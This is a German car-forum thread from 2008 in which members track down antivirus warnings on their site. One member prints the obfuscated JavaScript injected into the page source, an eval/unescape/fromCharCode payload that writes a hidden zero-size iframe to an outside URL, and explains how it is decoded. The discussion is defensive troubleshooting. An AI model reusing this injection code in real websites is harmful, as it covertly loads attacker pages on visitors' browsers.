1. Portal
  2. Blog
    1. Artikel
  3. Kalender
    1. Anstehende Termine
  4. Forum
  5. Galerie
    1. Alben
  • Anmelden
  • Registrieren
  • Suche
Dieses Thema
  • Alles
  • Dieses Thema
  • Dieses Forum
  • Artikel
  • Seiten
  • Blog-Artikel
  • Termine
  • Forum
  • Galerie
  • Erweiterte Suche
  1. A3quattro.de
  2. Forum
  3. Willkommen bei A3-quattro.de !!! Vorstellungs- und Mitgliederbereich
  4. Fragen und Wünsche Rund ums Forum

Seit Tagen immer mehr Trojaner warnungen hier...

  • somepeer
  • 7. April 2008 um 14:54
  • somepeer
    Gast
    • 23. November 2008 um 14:31
    • #61

    Ich bin nach wie vor sicher das es nicht nur am Virenscanner liegt, seit dem Wechsel auf den Firefox habe ich nicht eine Meldung erhalten!

    Anders sieht es aus wenn ich IE6 oder 7 benutze Shok

    • Zitieren
  • Krally
    Preisnörgler, Querulant und Threadstörer in einer Person
    Beiträge
    1.466
    • 23. November 2008 um 14:39
    • #62

    aber es ist doch keine meldung eines virenschutzprogramms.

    es geht eine windows-warnmeldung auf.
    nix vom virenscanner.

    hier zu hause hab ich auch firefox und adblock und daher ruhe.
    nur auf der arbeit kann ich nix installieren oder so.
    und es nervt wenn ich mal kurz was nachsehen will und dauernd kommt diese scheiß warnmeldung.

    • Zitieren
  • Paramedic_LU
    Steuerketten-Querulant
    Reaktionen
    93
    Blog-Artikel
    8
    Beiträge
    48.061
    Bilder
    211
    Videos
    5
    • 23. November 2008 um 14:43
    • #63

    Komisch, auf Arbeit bekomm ich weder vom dortigen XP, Internetexplorer, noch Virenscanner eine Meldung.

    Und der Laden sollte seine IT im Griff haben bei über 30000 Leut.
    Mir is das echt rätselhaft und bin froh wenns neue Forum läuft

    A3 3.2 quattro mauritiusblau seit 16.9.03
    + AUDI-Werkstuning 8087 seit Juni 2007
    [customized] - NWT powered by Custom-Chips (Engineering by Stefan - Powered by Zoran)
    [VCDS Ross-Tech HEX+CAN USB
    184708_5.png
    545860_5.png

    Öl-Finder für VW und Audi Fahrzeuge und FAQ Motoröl
    mein Blog Baubericht BK-117 B2 Christoph 53

    • Zitieren
  • somepeer
    Gast
    • 23. November 2008 um 14:48
    • #64

    Also das eine Meldung von Win kommt lese ich von dir hier zum ersten mal, bei allen anderen waren es immer nur die Scanner Kerze .

    Kannst du auf der Arbeit Programme von einem USB Stick aus starten?
    Firefox gibts ja auch als mobile Version die ohne Installation vom Stick läuft, leider wird auch das oft von den Admins gesperrt, einen Versuch wäre es aber wert.


    MfG

    • Zitieren
  • Krally
    Preisnörgler, Querulant und Threadstörer in einer Person
    Beiträge
    1.466
    • 23. November 2008 um 15:10
    • #65

    ich meinte mit "es geht ein fenster auf" die windows warnmeldung.
    war wohl blöd ausgedrückt.

    die firefox stick lösung werde ich morgen probieren.
    k.a. inwieweit dies gesperrt ist.
    aber ich glaube alle "zusatzlaufwerke" gehen nicht.

    • Zitieren
  • br403
    Meister
    Reaktionen
    1
    Beiträge
    2.454
    • 23. November 2008 um 19:55
    • #66

    Ich habe hier keine Meldungen, weder vom AV noch vom Windows.

    Krally: Kannst du bitte mal nachschauen was für ein AV auf deinem PC im Büro installiert ist? Ausserdem wäre es genial wenn du einen Screenshot der betreffenden Meldung machen könntest.

    Falls du nicht weisst wie das geht:

    Wenn die Meldung kommt, einfach die "Druck" Taste drücken. Dann Paint öffnen, Edit -> einfügen. Dann das Bild möglichst als .jpg abspeichern. Dann mal hier posten.

    Ich denke nur so kommen wir in der Sache hier weiter.

    • Zitieren
  • Bratschlauch
    Erleuchteter
    Reaktionen
    2
    Beiträge
    3.858
    Bilder
    57
    • 23. November 2008 um 20:05
    • #67

    Bei mir ist es vom Virenscanner,hab das aber auch erst seit einiger Zeit,weiß nicht genau wie lange,aber vor 1oder 2 Monaten hatte ich das auch noch nicht????

    Wer das hier liest hat Puschen an! :D

    Mein A6 3.0 TFSI Quattro

    Hubraum ist durch nichts zu ersetzen...außer durch einen Turbo. :D

    • Zitieren
  • Krally
    Preisnörgler, Querulant und Threadstörer in einer Person
    Beiträge
    1.466
    • 23. November 2008 um 22:18
    • #68

    mach ich morgen..

    ich hoffe das paint auf dem rechner ist.
    ansonsten mach ich mit dem handy ein bild des monitors und der darstellung. ;)

    • Zitieren
  • Miles
    Profi
    Beiträge
    970
    • 24. November 2008 um 10:01
    • #69

    Mal bei Virustotal hoch geladen:

    AhnLab-V3 2008.11.21.0 2008.11.24 -
    AntiVir 7.9.0.35 2008.11.24 HTML/Crypted.Gen
    Authentium 5.1.0.4 2008.11.24 -
    Avast 4.8.1281.0 2008.11.23 -
    AVG 8.0.0.199 2008.11.23 HTML/Framer.J
    BitDefender 7.2 2008.11.24 -
    CAT-QuickHeal 10.00 2008.11.24 -
    ClamAV 0.94.1 2008.11.24 -
    DrWeb 4.44.0.09170 2008.11.24 Trojan.DownLoader.35184
    eSafe 7.0.17.0 2008.11.23 -
    eTrust-Vet 31.6.6225 2008.11.24 -
    Ewido 4.0 2008.11.23 -
    F-Prot 4.4.4.56 2008.11.24 -
    Fortinet 3.117.0.0 2008.11.24 JS/Psyme.ME
    GData 19 2008.11.24 -
    Ikarus T3.1.1.45.0 2008.11.24 -
    K7AntiVirus 7.10.531 2008.11.22 -
    Kaspersky 7.0.0.125 2008.11.24 -
    McAfee 5443 2008.11.23 -
    McAfee+Artemis 5443 2008.11.23 -
    Microsoft 1.4104 2008.11.24 -
    NOD32 3634 2008.11.24 -
    Norman 5.80.02 2008.11.22 -
    Panda 9.0.0.4 2008.11.23 -
    PCTools 4.4.2.0 2008.11.23 -
    Rising 21.05.00.00 2008.11.24 -
    SecureWeb-Gateway 6.7.6 2008.11.24 Heuristic.Script.Crypted
    Sophos 4.35.0 2008.11.24 -
    Sunbelt 3.1.1823.2 2008.11.22 -
    Symantec 10 2008.11.24 -
    TheHacker 6.3.1.1.161 2008.11.24 -
    TrendMicro 8.700.0.1004 2008.11.24 -
    VBA32 3.12.8.9 2008.11.23 -
    ViRobot 2008.11.18.1474 2008.11.18 -
    VirusBuster 4.5.11.0 2008.11.23 -

    Nach wie vor Antivir mit crypted.gen Virus... Suche gerade Google woran das liegen könnte

    *hierkommtbaldwiederderdsgsmileyrein!*

    • Zitieren
  • Paramedic_LU
    Steuerketten-Querulant
    Reaktionen
    93
    Blog-Artikel
    8
    Beiträge
    48.061
    Bilder
    211
    Videos
    5
    • 24. November 2008 um 10:08
    • #70

    Was wurde da hochgeladen?

    Gibts was neues zum neuen Forum?

    A3 3.2 quattro mauritiusblau seit 16.9.03
    + AUDI-Werkstuning 8087 seit Juni 2007
    [customized] - NWT powered by Custom-Chips (Engineering by Stefan - Powered by Zoran)
    [VCDS Ross-Tech HEX+CAN USB
    184708_5.png
    545860_5.png

    Öl-Finder für VW und Audi Fahrzeuge und FAQ Motoröl
    mein Blog Baubericht BK-117 B2 Christoph 53

    • Zitieren
  • Miles
    Profi
    Beiträge
    970
    • 24. November 2008 um 10:23
    • #71

    Ich hab ihn!!!!


    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860
    %2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1
    15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C
    112%2C58%2C47%2C47%2C108%2C111%2C103%2C105%2
    C116%2C101%2C99%2C104%2C49%2C46%2C101%2C120%
    C116%2C114%2C97%2C46%2C104%2C117%2C47%2C105%
    2C99%2C101%2C95%2C101%2C110%2C95%2C99%2C108%
    2C101%2C97%2C110%2C47%2C105%2C110%2C100%2C101
    %2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C11
    9%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C3
    4%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2
    C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C10
    2%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>
    <script language="JavaScript">
    function JumpSelect() {if(document.forumjump.jumpid.options[document.forumjump.jumpid.selectedIndex].value != -1) document.forumjump.submit();}
    </script>


    Das ist im Quelltext drin!!!!


    Dieser Kram ruft die Seite
    http://logitech1.extra.hu/ice_en_clean/index.php auf!!

    Es handelt sich also um keine Fehlermeldung, sondern um einen tatsächlichen HTML-Trojaner!!

    Ist wohl nicht weiter schlimm, aber wie ist der Kram da rein gekommen?

    Micha, fix it or let me fix it :)


    edit by some: Riesenskript auf Seitenbreite gebracht ;)

    *hierkommtbaldwiederderdsgsmileyrein!*

    • Zitieren
  • Paramedic_LU
    Steuerketten-Querulant
    Reaktionen
    93
    Blog-Artikel
    8
    Beiträge
    48.061
    Bilder
    211
    Videos
    5
    • 24. November 2008 um 10:33
    • #72

    Ufff :-o

    Was ein Scheiss :(
    Gute Frage wie das da hin kommt.
    Aber ne Belohnung hast Dir schon verdient Verabredung

    Die vielen Zeichen da oben sagen mir nicht viel.
    Wie eben am Telefon besprochen, Cris hat die Daten zur Hand

    A3 3.2 quattro mauritiusblau seit 16.9.03
    + AUDI-Werkstuning 8087 seit Juni 2007
    [customized] - NWT powered by Custom-Chips (Engineering by Stefan - Powered by Zoran)
    [VCDS Ross-Tech HEX+CAN USB
    184708_5.png
    545860_5.png

    Öl-Finder für VW und Audi Fahrzeuge und FAQ Motoröl
    mein Blog Baubericht BK-117 B2 Christoph 53

    • Zitieren
  • Miles
    Profi
    Beiträge
    970
    • 24. November 2008 um 10:42
    • #73

    Jo, eben mit im telefoniert. Hat er jetzt auch nicht, aber wir telefonieren heute Abend (chris und ich) und lösen das Problem.

    Das sind ASCII-Zeichen.
    Diese werden dort im Script doppelt gewandelt!

    Einmal mit unescape ( %28 ist z.B. ein "(" ) und dann von dezimal in ein String (Zeichenfolge), siehe: http://www.torsten-horn.de/techdocs/ascii.htm

    Unten steht z.B. 105%2C114%2C, daraus wird mit unescape 105,114, und mit string.fromcharcode "ir"..

    Wurde wohl benutzt um diese komische URL so gut wie möglich zu verschleiern.

    Grüße
    Miles

    *hierkommtbaldwiederderdsgsmileyrein!*

    • Zitieren
  • Miles
    Profi
    Beiträge
    970
    • 24. November 2008 um 10:49
    • #74

    Wir sind nicht die einzigen mit dem Problem und phpkit!

    http://forum.kaspersky.com/index.php?showtopic=62930

    *hierkommtbaldwiederderdsgsmileyrein!*

    • Zitieren
  • Krally
    Preisnörgler, Querulant und Threadstörer in einer Person
    Beiträge
    1.466
    • 24. November 2008 um 11:10
    • #75

    das ist ja schön zu hören, dass der fehler gefunden ist.

    hier auf der arbeit hab ich norman anti virus.
    mit xp und ie 7

    firefox mit stick geht nicht.
    bild der fehlermeldung hab ich gemacht, gebe ich heute abend an para zwecks hochladen weiter.

    • Zitieren
  • somepeer
    Gast
    • 24. November 2008 um 11:21
    • #76

    Sehr interessant miles!
    Schön das du das gefunden hast Statur !

    Gefahr geht von der gelinkten Seite wohl nicht aus, soweit ich das da erkennen kann ist das eine Benachrichtigung des Hosters das die Seite/Domain nicht mehr existiert/verfügbar ist, erklärt aber den Alarm der Virenscanner.

    Ist es möglich das der Firefox diesen ASCII Zeichensatz Ignoriert?


    MfG

    • Zitieren
  • Miles
    Profi
    Beiträge
    970
    • 24. November 2008 um 12:35
    • #77

    Firefox öffnet den Link einfach, bekommt wohl Antivir nicht mit!

    Mit Firebug (Plugin für Firefox) sieht man schön, wie er den Link vom Frame aus öffnet!

    Antivir findet den String Char Kram, aber irgendwie nicht im Firefox.

    Grüße

    *hierkommtbaldwiederderdsgsmileyrein!*

    • Zitieren
  • matbold
    riding passes
    Blog-Artikel
    1
    Beiträge
    7.796
    Bilder
    63
    • 24. November 2008 um 21:24
    • #78

    Super Miles, wenn Ihr das heute Abend raus bekommt, dann seid Ihr echt die Helden!
    Seit Monaten nervt mich die dämliche Meldung schon... Ob ich noch ohne leben kann?? :D

    Mein gutes Stück:
    A3 1.9 [lexicon]TDI[/lexicon] Ambiente mit ein paar zusätzlichen Sachen, die das Fahren noch angenehmer machen - ist Vergangenheit.

    Die Gegenwart heißt A3 8V 2.0 [lexicon]TDI[/lexicon] clean Diesel (150PS) mit ne Menge Schnickes. :D - auch Vergangeheit
    Die Zukunft ist elektrisch. Ich übe schonmal mit einem Q3 45 Sportback TFSIe. Zu Hause nur elektrisch. Unterwegs gemischt - wenn möglich. Dann gibt es auch Spaß mit den 245PS.

    [size=18][font='Arial, Helvetica, sans-serif']Moderator der besten Audi-Community der Welt![/font][/size]

    • Zitieren
  • Krally
    Preisnörgler, Querulant und Threadstörer in einer Person
    Beiträge
    1.466
    • 25. November 2008 um 09:40
    • #79

    @para
    hast du meine bildschirm-hardcopy nicht bekommen?

    ----------------
    wie siehts denn aus? bekommt ihr das weg?

    • Zitieren
  • Paramedic_LU
    Steuerketten-Querulant
    Reaktionen
    93
    Blog-Artikel
    8
    Beiträge
    48.061
    Bilder
    211
    Videos
    5
    • 25. November 2008 um 10:03
    • #80

    Ich habs bekommen und weitergeleitet an Miles und Crislee

    Weiss aber nicht ob die schon dazu kamen

    A3 3.2 quattro mauritiusblau seit 16.9.03
    + AUDI-Werkstuning 8087 seit Juni 2007
    [customized] - NWT powered by Custom-Chips (Engineering by Stefan - Powered by Zoran)
    [VCDS Ross-Tech HEX+CAN USB
    184708_5.png
    545860_5.png

    Öl-Finder für VW und Audi Fahrzeuge und FAQ Motoröl
    mein Blog Baubericht BK-117 B2 Christoph 53

    • Zitieren

Jetzt anmelden!

Du hast noch kein Benutzerkonto auf unserer Seite? Melde Dich kostenlos an und werde Teil unserer Community!

Benutzerkonto erstellen Anmelden

Registrierung

Du hast noch kein Benutzerkonto auf unserer Seite? Melde Dich kostenlos an und werde Teil unserer Community!

Benutzerkonto erstellen
  1. Datenschutzerklärung
  2. Impressum